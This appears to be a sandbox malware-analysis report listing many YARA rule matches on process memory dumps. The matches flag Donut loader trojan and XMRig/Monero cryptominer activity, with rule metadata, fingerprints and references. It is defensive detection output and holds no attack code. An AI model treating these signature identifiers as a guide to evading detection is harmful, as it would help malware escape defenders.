Source: 00000005.00000002.1747235973.0000000000B52000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_5c38878d os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 3b55ec6c37891880b53633b936d10f94d2b806db1723875e4ac95f8a34d97150, id = 5c38878d-ca94-4fd9-a36e-1ae5fe713ca2, last_modified = 2021-01-13
Source: 00000009.00000003.1782171158.0000013CBC451000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000000B.00000003.1773661287.000001E32C45B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000000B.00000003.1778567981.000001E32C45C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000000B.00000003.1778062444.000001E32C45C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000009.00000003.1778364513.0000013CBC45D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000000B.00000003.1787144711.000001E32C45F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000009.00000003.1777354712.0000013CBC45C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000009.00000003.1786769697.0000013CBC455000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000009.00000003.1774881873.0000013CBC45A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000000B.00000003.1776176780.000001E32C457000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000000B.00000003.1782316167.000001E32C45C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000009.00000003.1771637621.0000013CBC45A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000009.00000003.1780152081.0000013CBC45C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000009.00000003.1777881414.0000013CBC454000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000000E.00000002.2901128329.0000029965300000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 0000000E.00000002.2901128329.0000029965300000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_5c38878d os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 3b55ec6c37891880b53633b936d10f94d2b806db1723875e4ac95f8a34d97150, id = 5c38878d-ca94-4fd9-a36e-1ae5fe713ca2, last_modified = 2021-01-13
Source: 0000000A.00000002.1784948706.00000000005C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 0000000A.00000002.1784948706.00000000005C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_5c38878d os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 3b55ec6c37891880b53633b936d10f94d2b806db1723875e4ac95f8a34d97150, id = 5c38878d-ca94-4fd9-a36e-1ae5fe713ca2, last_modified = 2021-01-13
Source: 00000009.00000003.1776373079.0000013CBC45E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000008.00000002.1757539408.0000000000A5E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000008.00000002.1757539408.0000000000A5E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_5c38878d os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 3b55ec6c37891880b53633b936d10f94d2b806db1723875e4ac95f8a34d97150, id = 5c38878d-ca94-4fd9-a36e-1ae5fe713ca2, last_modified = 2021-01-13
Source: 0000000B.00000003.1777548683.000001E32C456000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000009.00000003.1781637275.0000013CBC454000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000000B.00000003.1785377801.000001E32C45A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000000B.00000003.1779837512.000001E32C459000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000009.00000003.1779369936.0000013CBC455000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000009.00000003.1780613340.0000013CBC456000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000000D.00000002.2900249494.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000000D.00000002.2900249494.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 0000000D.00000002.2900249494.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 00000009.00000003.1776847391.0000013CBC452000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000000C.00000002.2900254186.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000000C.00000002.2900254186.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 0000000C.00000002.2900254186.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 00000009.00000003.1782890833.0000013CBC45F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000000B.00000003.1775687094.000001E32C45D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000001.00000002.1725057798.0000015759250000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000001.00000002.1725057798.0000015759250000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_5c38878d os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 3b55ec6c37891880b53633b936d10f94d2b806db1723875e4ac95f8a34d97150, id = 5c38878d-ca94-4fd9-a36e-1ae5fe713ca2, last_modified = 2021-01-13
Source: 0000000B.00000003.1780288557.000001E32C455000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000009.00000003.1779753714.0000013CBC45E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000009.00000003.1784061209.0000013CBC451000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000000B.00000003.1779051954.000001E32C453000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000000B.00000003.1783041722.000001E32C45D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000000B.00000003.1781787948.000001E32C45D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000009.00000003.1778886806.0000013CBC45C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000000B.00000003.1775201573.000001E32C458000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000000B.00000003.1777129699.000001E32C45A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000000B.00000003.1774272742.000001E32C455000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000009.00000003.1775332478.0000013CBC45A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000000B.00000003.1779467909.000001E32C452000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000000B.00000003.1772421269.000001E32C453000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000000B.00000003.1788508164.000001E32C45D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000009.00000003.1770961178.0000013CBC453000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
